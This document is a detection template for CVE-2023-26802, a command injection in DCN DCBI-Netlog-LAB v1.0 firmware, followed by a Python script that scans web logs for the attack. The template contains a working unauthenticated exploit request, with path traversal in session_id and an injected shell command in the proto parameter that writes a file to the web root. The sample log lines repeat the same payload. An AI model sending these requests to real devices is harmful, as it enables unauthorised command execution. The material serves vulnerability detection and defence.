Vulnerability Description
An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.
id: CVE-2023-26802
info:
  name: DCBI-Netlog-LAB v1.0 - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.
  impact: |
    Unauthenticated attackers can bypass authentication and execute arbitrary OS commands on the DCN DCBI-Netlog-LAB device, leading to complete device compromise and potential network infiltration.
  remediation: |
    Upgrade to the latest firmware version from DCN that addresses this command injection vulnerability, or apply vendor-provided security patches.
  reference:
    - https://web.archive.org/web/20230605051153/https://github.com/winmt/my-vuls/tree/main/DCN%20DCBI-Netlog-LAB
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-26802
    cwe-id: CWE-22
    epss-score: 0.84594
    epss-percentile: 0.99298
    cpe: cpe:2.3:o:dcnglobal:dcbi-netlog-lab_firmware:1.0:*:*:*:*:*:*:*
  metadata:
    vendor: dcnglobal
    product: dcbi-netlog-lab_firmware
  tags: cve,cve2023,rce,unauth,netlog,vkev,vuln
variables:
  file_name: "{{rand_text_alpha(4)}}.html"
http:
  - raw:
      - |
        GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=../&lang=zh_CN.UTF-8&act=2&proto=;ls>/usr/local/lyx/lyxcenter/web/{{file_name}}; HTTP/1.1
        Host: {{Hostname}}
        DNT: 1
        X-Forwarded-For: 8.8.8.8
      - |
        GET /{{file_name}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        DNT: 1
        X-Forwarded-For: 8.8.8.8
    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "nsg_bridge.cgi"
          - "nsg_dhcpactiveip.cgi"
        condition: and
      - type: status
        status:
          - 200
# digest: 4a0a004730450220799f4e6920c327b304047b9e48c4800ef31f8f0df9dd675800370bc9af6f93ee022100a44bfaf85d6e4cc2cb20a20c2624146c856b0d17834fd2313a467c74591249a3:922c64590222798bb761d5b6d8e72950
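
A defender-side check for the request shape this template sends, added here as an example (it is not part of the original template or the vendor's code): it scans web access logs for calls to nsg_masq.cgi whose session_id carries path traversal or whose proto carries shell metacharacters. The combined log format, the sample lines and the benign values (session_id=8f3a91c2, proto=tcp) are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request line inside a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST) (.+?) HTTP/[\d.]+"')
CGI_SUFFIX = "/network_config/nsg_masq.cgi"
# Characters a shell treats specially; none belong in a protocol name.
SHELL_META = re.compile(r"[;|&`$<>(){}\n\r]")

# Constructed sample access-log lines (not captured from a real device).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=8f3a91c2&lang=zh_CN.UTF-8&act=2&proto=tcp HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=../&lang=zh_CN.UTF-8&act=2&proto=;ls>/usr/local/lyx/lyxcenter/web/abcd.html; HTTP/1.1" 200 0',
    '198.51.100.9 - - [01/Jan/2024:10:02:00 +0000] "GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=..%2F&act=2&proto=%3Bls%3E%2Fusr%2Flocal%2Flyx%2Flyxcenter%2Fweb%2Fabcd.html%3B HTTP/1.1" 200 0',
    '203.0.113.7 - - [01/Jan/2024:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]


def suspicious_reasons(log_line):
    """Return the reasons a log line matches the CVE-2023-26802 request shape."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith(CGI_SUFFIX):
        return []
    # parse_qs percent-decodes values, so encoded and raw payloads compare alike.
    params = parse_qs(url.query, keep_blank_values=True, separator="&")
    reasons = []
    for value in params.get("session_id", []):
        if ".." in value or "/" in value or "\\" in value:
            reasons.append("session_id contains path traversal")
    for value in params.get("proto", []):
        if SHELL_META.search(value):
            reasons.append("proto contains shell metacharacters")
    return reasons


def scan(lines):
    """Return (line index, reasons) for every line that looks suspicious."""
    return [(i, r) for i, line in enumerate(lines) if (r := suspicious_reasons(line))]


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_LOG):
        print(idx, reasons)
```

A hit on either condition warrants checking the device's web root for recently created files, since the template's second request reads back a file written there.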